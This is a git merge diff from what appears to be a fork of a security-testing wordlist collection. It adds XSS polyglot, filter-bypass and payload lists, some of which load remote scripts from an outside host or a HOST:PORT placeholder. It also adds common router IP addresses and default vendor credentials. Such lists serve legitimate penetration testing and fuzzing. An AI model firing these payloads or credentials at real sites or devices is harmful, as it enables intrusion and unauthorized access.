Merge pull request #1 from danielmiessler/master

updating local

Fuzzing/0xsobky-UltimateXSSPolyglot.txt

@@ -0,0 +1 @@
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Fuzzing/BRUTELOGIC-XSS-BYPASS-STRINGS.txt

@@ -0,0 +1,17 @@
+alert`1`
+alert(1)
+alert(1&#x29
+alert(1&#41
+(alert)(1)
+a=alert,a(1)
+[1].find(alert)
+top["al"+"ert"](1)
+top[/al/.source+/ert/.source](1)
+al\u0065rt(1)
+top['al\145rt'](1)
+top['al\x65rt'](1)
+top[8680439..toString(30)](1)
+navigator.vibrate(500)
+eval(URL.slice(-8))>#alert(1)
+eval(location.hash.slice(1)>#alert(1)
+innerHTML=location.hash>#<script>alert(1)</script>

Fuzzing/BRUTELOGIC-XSS-STRINGS.txt

@@ -0,0 +1,113 @@
+<svg onload=alert(1)>
+"><svg onload=alert(1)//
+"onmouseover=alert(1)//
+"autofocus/onfocus=alert(1)//
+'-alert(1)-'
+'-alert(1)//
+\'-alert(1)//
+</script><svg onload=alert(1)>
+<x contenteditable onblur=alert(1)>lose focus! 
+<x onclick=alert(1)>click this! 
+<x oncopy=alert(1)>copy this! 
+<x oncontextmenu=alert(1)>right click this! 
+<x oncut=alert(1)>copy this! 
+<x ondblclick=alert(1)>double click this! 
+<x ondrag=alert(1)>drag this! 
+<x contenteditable onfocus=alert(1)>focus this! 
+<x contenteditable oninput=alert(1)>input here! 
+<x contenteditable onkeydown=alert(1)>press any key! 
+<x contenteditable onkeypress=alert(1)>press any key! 
+<x contenteditable onkeyup=alert(1)>press any key! 
+<x onmousedown=alert(1)>click this! 
+<x onmousemove=alert(1)>hover this! 
+<x onmouseout=alert(1)>hover this! 
+<x onmouseover=alert(1)>hover this! 
+<x onmouseup=alert(1)>click this! 
+<x contenteditable onpaste=alert(1)>paste here!
+<script>alert(1)// 
+<script>alert(1)<!–
+<script src=//brutelogic.com.br/1.js> 
+<script src=//3334957647/1>
+%3Cx onxxx=alert(1) 
+<%78 onxxx=1 
+<x %6Fnxxx=1 
+<x o%6Exxx=1 
+<x on%78xx=1 
+<x onxxx%3D1
+<X onxxx=1 
+<x OnXxx=1 
+<X OnXxx=1 
+<x onxxx=1 onxxx=1
+<x/onxxx=1 
+<x%09onxxx=1 
+<x%0Aonxxx=1 
+<x%0Conxxx=1 
+<x%0Donxxx=1 
+<x%2Fonxxx=1 
+<x 1='1'onxxx=1 
+<x 1="1"onxxx=1
+<x </onxxx=1 
+<x 1=">" onxxx=1 
+<http://onxxx%3D1/
+<x onxxx=alert(1) 1='
+<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
+'onload=alert(1)><svg/1='
+'>alert(1)</script><script/1=' 
+*/alert(1)</script><script>/*
+*/alert(1)">'onload="/*<svg/1='
+`-alert(1)">'onload="`<svg/1='
+*/</script>'>alert(1)/*<script/1='
+<script>alert(1)</script> 
+<script src=javascript:alert(1)> 
+<iframe src=javascript:alert(1)> 
+<embed src=javascript:alert(1)> 
+<a href=javascript:alert(1)>click 
+<math><brute href=javascript:alert(1)>click 
+<form action=javascript:alert(1)><input type=submit> 
+<isindex action=javascript:alert(1) type=submit value=click> 
+<form><button formaction=javascript:alert(1)>click 
+<form><input formaction=javascript:alert(1) type=submit value=click> 
+<form><input formaction=javascript:alert(1) type=image value=click> 
+<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
+<isindex formaction=javascript:alert(1) type=submit value=click> 
+<object data=javascript:alert(1)> 
+<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
+<svg><script xlink:href=data:,alert(1) /> 
+<math><brute xlink:href=javascript:alert(1)>click 
+<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
+<html ontouchstart=alert(1)> 
+<html ontouchend=alert(1)> 
+<html ontouchmove=alert(1)> 
+<html ontouchcancel=alert(1)>
+<body onorientationchange=alert(1)>
+"><img src=1 onerror=alert(1)>.gif
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
+GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
+<script src="data:&comma;alert(1)//
+"><script src=data:&comma;alert(1)//
+<script src="//brutelogic.com.br&sol;1.js&num; 
+"><script src=//brutelogic.com.br&sol;1.js&num; 
+<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
+"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
+<base href=//0>
+<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)
+<body onload=alert(1)>
+<body onpageshow=alert(1)>
+<body onfocus=alert(1)>
+<body onhashchange=alert(1)><a href=#x>click this!#x
+<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
+<body onscroll=alert(1)><br><br><br><br>
+<br><br><br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><x id=x>#x
+<body onresize=alert(1)>press F12!
+<body onhelp=alert(1)>press F1! (MSIE)
+<marquee onstart=alert(1)>
+<marquee loop=1 width=0 onfinish=alert(1)>
+<audio src onloadstart=alert(1)>
+<video onloadstart=alert(1)><source>
+<input autofocus onblur=alert(1)>
+<keygen autofocus onfocus=alert(1)>
+<form onsubmit=alert(1)><input type=submit>
+<select onchange=alert(1)><option>1<option>2
+<menu id=x contextmenu=x onshow=alert(1)>right click me!

Miscellaneous/common_router_ips.txt

@@ -0,0 +1,51 @@
+10.0.0.1
+10.0.0.138
+10.0.0.2
+10.0.1.1
+10.1.1.1
+10.1.10.1
+10.10.1.1
+10.90.90.90
+192.168.0.1
+192.168.0.10
+192.168.0.100
+192.168.0.101
+192.168.0.227
+192.168.0.254
+192.168.0.3
+192.168.0.30
+192.168.0.50
+192.168.1.1
+192.168.1.10
+192.168.1.10.1
+192.168.1.100
+192.168.1.200
+192.168.1.210
+192.168.1.254
+192.168.1.99
+192.168.10.1
+192.168.10.10
+192.168.10.100
+192.168.10.50
+192.168.100.1
+192.168.100.100
+192.168.102.1
+192.168.11.1
+192.168.123.254
+192.168.15.1
+192.168.16.1
+192.168.168.168
+192.168.2.1
+192.168.2.254
+192.168.20.1
+192.168.223.100
+192.168.251.1
+192.168.254.254
+192.168.3.1
+192.168.30.1
+192.168.4.1
+192.168.50.1
+192.168.55.1
+192.168.62.1
+192.168.8.1
+200.200.200.5

Passwords/default-passwords.csv

@@ -833,6 +833,7 @@ Kalatel,<N/A>,8111,
 kaptest,admin,<BLANK>,
 KASDA,admin,adslroot,
 Keyscan,keyscan,KEYSCAN,
+Kodi,kodi,kodi,
 Konica Minolta,<BLANK>,sysAdmin,
 Konica Minolta,<BLANK>,1234,
 Konica Minolta,<BLANK>,<BLANK>,
@@ -1232,6 +1233,7 @@ Osicom,Manager,Manager,
 Osicom,sysadm,Admin,
 Osicom,sysadm,sysadm,
 Osicom,write,private,
+OSMC,osmc,osmc,
 Overland,Factory,56789,
 ovislink,root,<BLANK>,
 Pacific Micro Data,pmd,<BLANK>,
@@ -1463,6 +1465,8 @@ stuccoboy,stuccoboy,100198,
 Sun,admin,admin,submit by Nabil Ouchn
 SUN,root,sun123,
 Sun Microsystems,root,changeme,
+Supercook,super,super,
+Supercook,admin,AlpheusDigital1010,
 Supermicro,ADMIN,admin,
 SuperMicro,<N/A>,ksdjfg934t,
 SuSE GmbH,root,root,

README.md

@@ -37,5 +37,8 @@ Significant effort is made to give attribution for these lists whenever possible
 - Special thanks to shipcod3 for MANY contributions!
 - Thanks to Samar Dhwoj Acharya for allowing his Github Dorks content to be included!
 - Thanks to Liam Somerville for the excellent list of default passwords
+- Great thanks to Michael Hendriksen for allowing us to include his Gitrob project's signatures 
+- Honored to have @Brutelogic's brilliant XSS Cheatsheet added to the Fuzzing section!
+- Added 0xsobky's Ultimate XSS Polyglot!
 
 This project stays great because of care and love from the community, and we will never forget that.